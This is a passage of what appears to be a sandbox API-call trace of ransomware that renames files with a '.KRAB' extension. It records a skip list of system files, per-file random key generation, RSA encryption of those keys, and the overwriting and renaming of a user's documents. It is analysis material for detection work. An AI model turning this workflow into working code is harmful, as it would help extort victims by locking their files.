lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\3JIaQ04Ky Uur8j.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\3jiaq04ky uur8j.wav.krab")) returned 1 [0055.458] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.458] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0055.458] lstrcmpW (lpString1="4 XO3.pdf", lpString2=".") returned 1 [0055.458] lstrcmpW (lpString1="4 XO3.pdf", lpString2="..") returned 1 [0055.458] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="4 XO3.pdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4 XO3.pdf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4 XO3.pdf" [0055.458] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.459] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4 XO3.pdf.KRAB") returned 52 [0055.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4 XO3.pdf") returned 47 [0055.459] lstrlenW (lpString=".pdf") returned 4 [0055.459] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.459] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".pdf ") returned 5 [0055.459] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4 XO3.pdf") returned 47 [0055.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4 XO3.pdf") returned 47 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="desktop.ini") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="autorun.inf") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="ntuser.dat") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="iconcache.db") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="bootsect.bak") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="boot.ini") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="ntuser.dat.log") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="thumbs.db") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="KRAB-DECRYPT.html") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="KRAB-DECRYPT.txt") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="CRAB-DECRYPT.txt") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="ntldr") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="NTDETECT.COM") returned -1 [0055.460] lstrcmpiW (lpString1="4 XO3.pdf", lpString2="Bootfont.bin") returned -1 [0055.460] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.460] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.461] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.461] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.461] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.461] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0055.461] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.461] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.462] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.462] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.462] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.463] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.463] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0055.463] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.463] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.463] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.463] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd860) returned 1 [0055.463] CryptGetKeyParam (in: hKey=0xfbd860, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.463] CryptEncrypt (in: hKey=0xfbd860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.464] GetLastError () returned 0x0 [0055.464] CryptDestroyKey (hKey=0xfbd860) returned 1 [0055.464] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.464] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.464] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd360) returned 1 [0055.465] CryptGetKeyParam (in: hKey=0xfbd360, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.465] CryptEncrypt (in: hKey=0xfbd360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.465] GetLastError () returned 0x0 [0055.465] CryptDestroyKey (hKey=0xfbd360) returned 1 [0055.465] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.465] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4 XO3.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\4 xo3.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0055.465] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0055.466] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0055.466] ReadFile (in: hFile=0x43c, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ef7c*=0x188c2, lpOverlapped=0x0) returned 1 [0055.482] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffe773e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.482] WriteFile (in: hFile=0x43c, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x188c2, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338ef78*=0x188c2, lpOverlapped=0x0) returned 1 [0055.483] WriteFile (in: hFile=0x43c, lpBuffer=0x3040000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3040000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0055.483] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.487] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.488] CloseHandle (hObject=0x43c) returned 1 [0055.490] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.490] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4 XO3.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\4 xo3.pdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\4 XO3.pdf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\4 xo3.pdf.krab")) returned 1 [0055.491] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.491] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0055.491] lstrcmpW (lpString1="7bsumngp.pptx", lpString2=".") returned 1 [0055.491] lstrcmpW (lpString1="7bsumngp.pptx", lpString2="..") returned 1 [0055.491] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="7bsumngp.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7bsumngp.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7bsumngp.pptx" [0055.491] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.492] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7bsumngp.pptx.KRAB") returned 56 [0055.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7bsumngp.pptx") returned 51 [0055.492] lstrlenW (lpString=".pptx") returned 5 [0055.492] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.492] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".pptx ") returned 6 [0055.492] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7bsumngp.pptx") returned 51 [0055.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7bsumngp.pptx") returned 51 [0055.492] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="desktop.ini") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="autorun.inf") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="ntuser.dat") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="iconcache.db") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="bootsect.bak") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="boot.ini") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="ntuser.dat.log") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="thumbs.db") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="KRAB-DECRYPT.html") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="KRAB-DECRYPT.txt") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="CRAB-DECRYPT.txt") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="ntldr") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="NTDETECT.COM") returned -1 [0055.493] lstrcmpiW (lpString1="7bsumngp.pptx", lpString2="Bootfont.bin") returned -1 [0055.493] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.493] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.494] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.494] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.494] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.494] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0055.495] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.495] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.495] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.495] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.496] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.496] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.496] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0055.496] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.496] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.497] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.497] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0055.497] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.497] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.497] GetLastError () returned 0x0 [0055.498] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0055.498] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.498] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.498] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd6e0) returned 1 [0055.498] CryptGetKeyParam (in: hKey=0xfbd6e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.498] CryptEncrypt (in: hKey=0xfbd6e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.499] GetLastError () returned 0x0 [0055.499] CryptDestroyKey (hKey=0xfbd6e0) returned 1 [0055.499] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.499] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7bsumngp.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\7bsumngp.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0055.499] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0055.499] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0055.500] ReadFile (in: hFile=0x43c, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ef7c*=0x106ef, lpOverlapped=0x0) returned 1 [0055.522] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffef911, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.522] WriteFile (in: hFile=0x43c, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x106ef, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338ef78*=0x106ef, lpOverlapped=0x0) returned 1 [0055.522] WriteFile (in: hFile=0x43c, lpBuffer=0x3040000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3040000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0055.524] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.543] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.544] CloseHandle (hObject=0x43c) returned 1 [0055.728] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.728] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7bsumngp.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\7bsumngp.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7bsumngp.pptx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\7bsumngp.pptx.krab")) returned 1 [0055.729] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.729] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0055.729] lstrcmpW (lpString1="7jr7I.avi", lpString2=".") returned 1 [0055.729] lstrcmpW (lpString1="7jr7I.avi", lpString2="..") returned 1 [0055.729] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="7jr7I.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7jr7I.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7jr7I.avi" [0055.729] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.730] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7jr7I.avi.KRAB") returned 52 [0055.730] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7jr7I.avi") returned 47 [0055.730] lstrlenW (lpString=".avi") returned 4 [0055.730] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.731] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".avi ") returned 5 [0055.731] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.731] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7jr7I.avi") returned 47 [0055.731] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7jr7I.avi") returned 47 [0055.731] lstrcmpiW (lpString1="7jr7I.avi", lpString2="desktop.ini") returned -1 [0055.731] lstrcmpiW (lpString1="7jr7I.avi", lpString2="autorun.inf") returned -1 [0055.731] lstrcmpiW (lpString1="7jr7I.avi", lpString2="ntuser.dat") returned -1 [0055.731] lstrcmpiW (lpString1="7jr7I.avi", lpString2="iconcache.db") returned -1 [0055.731] lstrcmpiW (lpString1="7jr7I.avi", lpString2="bootsect.bak") returned -1 [0055.731] lstrcmpiW (lpString1="7jr7I.avi", lpString2="boot.ini") returned -1 [0055.731] lstrcmpiW (lpString1="7jr7I.avi", lpString2="ntuser.dat.log") returned -1 [0055.731] lstrcmpiW (lpString1="7jr7I.avi", lpString2="thumbs.db") returned -1 [0055.732] lstrcmpiW (lpString1="7jr7I.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0055.732] lstrcmpiW (lpString1="7jr7I.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0055.732] lstrcmpiW (lpString1="7jr7I.avi", lpString2="CRAB-DECRYPT.txt") returned -1 [0055.732] lstrcmpiW (lpString1="7jr7I.avi", lpString2="ntldr") returned -1 [0055.732] lstrcmpiW (lpString1="7jr7I.avi", lpString2="NTDETECT.COM") returned -1 [0055.732] lstrcmpiW (lpString1="7jr7I.avi", lpString2="Bootfont.bin") returned -1 [0055.732] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.732] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.733] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.733] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.733] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.733] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0055.733] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.733] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.734] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbcf58) returned 1 [0055.734] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.735] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0055.735] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0055.735] CryptGenRandom (in: hProv=0xfbcf58, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0055.735] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.735] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.735] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.736] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd860) returned 1 [0055.736] CryptGetKeyParam (in: hKey=0xfbd860, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.736] CryptEncrypt (in: hKey=0xfbd860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.736] GetLastError () returned 0x0 [0055.736] CryptDestroyKey (hKey=0xfbd860) returned 1 [0055.736] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.736] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbcf58) returned 1 [0055.737] CryptImportKey (in: hProv=0xfbcf58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd460) returned 1 [0055.737] CryptGetKeyParam (in: hKey=0xfbd460, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0055.737] CryptEncrypt (in: hKey=0xfbd460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3040100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3040100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0055.737] GetLastError () returned 0x0 [0055.737] CryptDestroyKey (hKey=0xfbd460) returned 1 [0055.737] CryptReleaseContext (hProv=0xfbcf58, dwFlags=0x0) returned 1 [0055.737] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7jr7I.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\7jr7i.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0055.738] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0055.738] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0055.738] ReadFile (in: hFile=0x43c, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ef7c*=0x18479, lpOverlapped=0x0) returned 1 [0055.753] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffe7b87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.754] WriteFile (in: hFile=0x43c, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x18479, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338ef78*=0x18479, lpOverlapped=0x0) returned 1 [0055.754] WriteFile (in: hFile=0x43c, lpBuffer=0x3040000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3040000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0055.754] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.758] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.759] CloseHandle (hObject=0x43c) returned 1 [0055.811] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.812] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7jr7I.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\7jr7i.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\7jr7I.avi.KRAB" 